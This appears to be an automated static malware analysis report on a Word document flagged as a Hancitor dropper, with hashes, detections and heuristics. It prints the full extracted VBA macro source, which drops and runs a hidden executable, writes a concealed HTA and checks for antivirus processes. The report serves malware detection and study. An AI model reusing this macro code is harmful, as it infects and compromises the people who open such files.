Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 77c930bfbf405087…

MALICIOUS

Office (OLE)

Size: 200.5 KB
Created: 2018-07-24 11:02:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 187d20d7bb1b84445587a7072202d8d0
SHA-1: 1bb46c2a04c7ed0a624d827de84c69372c392df5
SHA-256: 77c930bfbf405087f59a279927f32450362a47269237525318dc5d22094a331b
Risk Score: 620

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer
  • T1059.003 Windows Command Shell

The sample contains VBA macros, including a Document_Open macro that executes a Base64-decoded command. This command uses cmd.exe to execute a ping command, likely as a delay mechanism before further execution. The script also attempts to use WMI to launch a process and to save the document as an XML document, potentially to facilitate execution. The presence of Ole10Native packaging and the ClamAV detection as 'Doc.Dropper.Hancitor' suggest dropper functionality.

Heuristics (17)

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation [high; CVE likely; CVE_2026_21514]
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Dropper.Hancitor-6774061-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0
  • XOR-encoded strings (key 0x30) [critical; SC_XOR_ENCODED]
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x30: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    Attempted x86 opcode disassembly
  • Ole10Native package drops an auto-executable payload [critical; OFFICE_PACKAGE_RISKY_FILE]
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected [medium; 8 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code
  • Potential Shell call in VBA [critical; OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • VBA WMI Win32_Process launcher [critical; OLE_VBA_WMI_PROCESS_CREATE]
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Dim mbbmbdf
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
    Dim gfdfsfsfs
  • VBA Base64-decoded Shell command stager [critical; OLE_VBA_BASE64_SHELL_COMMAND_STAGER]
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Dim mbbmbdf
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
    Dim gfdfsfsfs
  • CreateObject call [high; OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script
    For Each x In yrtfdsad
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
    Dim pipec As Boolean: pipec = True
  • GetObject call [high; OLE_VBA_GETOBJ]
    GetObject call
    Matched line in script
    Dim mbbmbdf
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
    Dim gfdfsfsfs
  • VBA p-code auto-exec with execution tokens [high; OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low; OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    On Error Resume Next
  • Environ() call (env variable access) [low; OLE_VBA_ENVIRON]
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
      Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZX …
  • Reference to LoadLibrary API [high; SC_STR_LOADLIBRARY]
    Reference to LoadLibrary API
  • Reference to VirtualProtect API [medium; SC_STR_VIRTUALPROTECT]
    Reference to VirtualProtect API
  • Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography - In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6529 bytes
SHA-256: a6a399d844911240fdc2c93c987153a5fbe365a1253cc1af79970773c96d0baa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


Call kfs
    


Call sdfsdf

 Set D = New DataObject
    D.SetText " "
    D.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "Module2"
Sub closee()
  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 15, t)

Dim kjfaa

kjfaa = "bd" & "agent.exe"
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In yrtfdsad
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim pipec As Boolean: pipec = True
 


 If x.Name = kjfaa Then
 Dim lhjxvcvx
 lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
 
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
  Print #1, lhjxvcvx
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain.exe" Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
   
       If x.Name = "n360.exe" Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
Next


Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function




Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
 Selection.MoveRight Unit:=wdCharacter, Count:=24
    Selection.TypeBackspace
        Selection.Copy

End Sub

Attribute VB_Name = "Module4"

Sub sdfsdf()
ChDir Environ("Temp")


Selection.TypeBackspace

Call kklk
Call fadf
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function
Sub fadf()
kk = ".p" & "if"

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")

FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif"
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{F3E33E4A-DFC0-4026-8E0A-92737009538B}{28A0BE8C-CC82-4B6A-A0CE-709662DE72B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{45DEC472-31EA-41AB-8DC2-15889D40DEF0}{E8B31496-3A16-4F88-85AA-67164B5AE72A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"
Sub kklk()
   
 ChDir Environ("Temp")
Dim kk, lll, jgf, tyretw, gdfsfsa

jgf = "x" & "e"

kk = ".p" & "if"
lll = "6" & ".e"
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{F00FB9D4-AC2A-420C-8F44-48EFF1381150}{55A426A6-DEEE-4BCB-A437-FD01CC4D64FB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{A5384945-3F54-4AB2-B715-590CC4CDCA24}{2017D4D8-067C-4576-A22B-F56E75BB2ACA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1600608157/Ole10Native
Size: 66773 bytes
SHA-256: e3e5de755478d928b6f6ab3dc3bbea93ab957814110850ce8f7c773036d13ccc